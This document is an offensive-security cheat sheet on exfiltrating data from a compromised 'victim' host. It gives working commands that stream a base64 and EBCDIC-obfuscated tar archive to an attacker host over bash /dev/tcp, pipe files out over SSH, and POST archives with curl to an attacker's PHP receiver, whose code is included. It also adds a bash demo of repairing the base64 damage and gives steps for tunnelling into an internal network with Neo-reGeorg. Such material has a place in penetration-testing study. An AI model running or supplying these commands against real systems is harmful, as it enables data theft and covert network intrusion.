
Exfiltration

Using TCP Socket

Attacker listener:

nc -lvp 8080 > /tmp/exfil.data

From victim (bash only: /dev/tcp/<host>/<port> is a bash built-in pseudo-path, not a device file, so this does not work from sh or dash):

tar zcf - folder/ | base64 | dd conv=ebcdic > /dev/tcp/1.2.3.4/8080

Decode data (the EBCDIC step is a fixed byte substitution, not encryption; it only keeps the base64 text out of naive string matching on the wire):

dd conv=ascii if=/tmp/exfil.data | base64 -d > exfil.tar
tar xvf exfil.tar

Using SSH

tar cf - folder/ | ssh kali@1.2.3.4 "cd /tmp/; tar xpf -"

Using HTTP(S)

From victim:

curl --data "file=$(tar zcf - folder | base64)" http://<attacker_ip>/contact.php

contact.php:

<?php
if (isset($_POST['file'])) {
    $file = fopen("/tmp/http.bs64", "w");
    fwrite($file, $_POST['file']);
    fclose($file);
}
?>

Decode file (curl --data sends the body without URL-encoding, so PHP's form parsing turns every `+` of the base64 alphabet into a space; put them back before decoding):

sudo sed -i 's/ /+/g' /tmp/http.bs64
cat /tmp/http.bs64 | base64 -d | tar xvfz -
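Why the sed step is needed, as an added example that is not from the original page: the script below builds the same `$(tar zcf - folder | base64)` payload, applies the `+` to space translation that PHP's application/x-www-form-urlencoded parsing performs on an un-encoded body (the simulation covers only `+`; no `%XX` escapes are present because curl --data did not add any), shows that the stored file no longer base64-decodes, and then applies the page's repair. The sample folder is constructed for the demo.

```shell
#!/usr/bin/env bash
# Simulates what contact.php stores in /tmp/http.bs64 after a plain
# "curl --data file=<base64>" POST, and the attacker-side repair.
set -eu

# Constructed sample data; random bytes guarantee '+' appears in the base64.
make_sample_folder() {
    local dir="$1"
    mkdir -p "$dir"
    printf 'token=AKIAEXAMPLE\n' > "$dir/env.txt"
    head -c 2048 /dev/urandom > "$dir/dump.bin"
}

# What $(tar zcf - folder | base64) expands to on the victim.
victim_payload() {
    ( cd "$(dirname "$1")" && tar zcf - "$(basename "$1")" ) | base64
}

# Form decoding as PHP applies it to $_POST['file']: '+' becomes ' '.
# Newlines from base64's 76-column wrapping survive unchanged.
php_form_decode() {
    sed 's/+/ /g'
}

# Returns 0 when the stored (damaged) copy is rejected by base64 -d,
# i.e. the corruption is real and not silently ignored.
stored_copy_is_corrupt() {
    ! base64 -d "$1" > /dev/null 2>&1
}

# The page's repair: restore '+', decode, unpack.
repair_and_unpack() {
    local stored="$1" outdir="$2"
    mkdir -p "$outdir"
    sed 's/ /+/g' "$stored" | base64 -d | tar xzf - -C "$outdir"
}

# Exit status 0 when the repaired archive matches the original folder.
demo() {
    local work
    work="$(mktemp -d)"
    make_sample_folder "$work/folder"
    victim_payload "$work/folder" | php_form_decode > "$work/http.bs64"
    stored_copy_is_corrupt "$work/http.bs64" || return 1
    repair_and_unpack "$work/http.bs64" "$work/out"
    diff -r "$work/folder" "$work/out/folder"
}
```

Two practical caveats on the victim-side command: the `$(...)` expansion puts the whole archive on curl's command line, so it fails for anything larger than the kernel's argument-length limit, and the `+` damage only exists because the body was not encoded. Piping instead, `tar zcf - folder | base64 -w0 | curl --data-urlencode "file@-" http://<attacker_ip>/contact.php`, keeps the argument list short and sends a properly encoded body, so the sed repair is unnecessary.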

HTTP Tunneling

When you can upload a file to the web server, use Neo-reGeorg.

  1. Generate the server-side tunnel scripts, encrypted with the key key, into the neoreg_servers/ directory:

python3 neoreg.py generate -k key

  2. Upload the script matching the target's server-side language (the .php, .aspx, .jsp, ... file from neoreg_servers/) to the web server.
  3. Create the tunnel from the attacker machine, pointing at the uploaded script:

python3 neoreg.py -k key -u <URL to uploaded file>

  4. Access the internal network through the SOCKS proxy neoreg now listens on locally (127.0.0.1:1080 by default), for example with proxychains or a browser's SOCKS setting.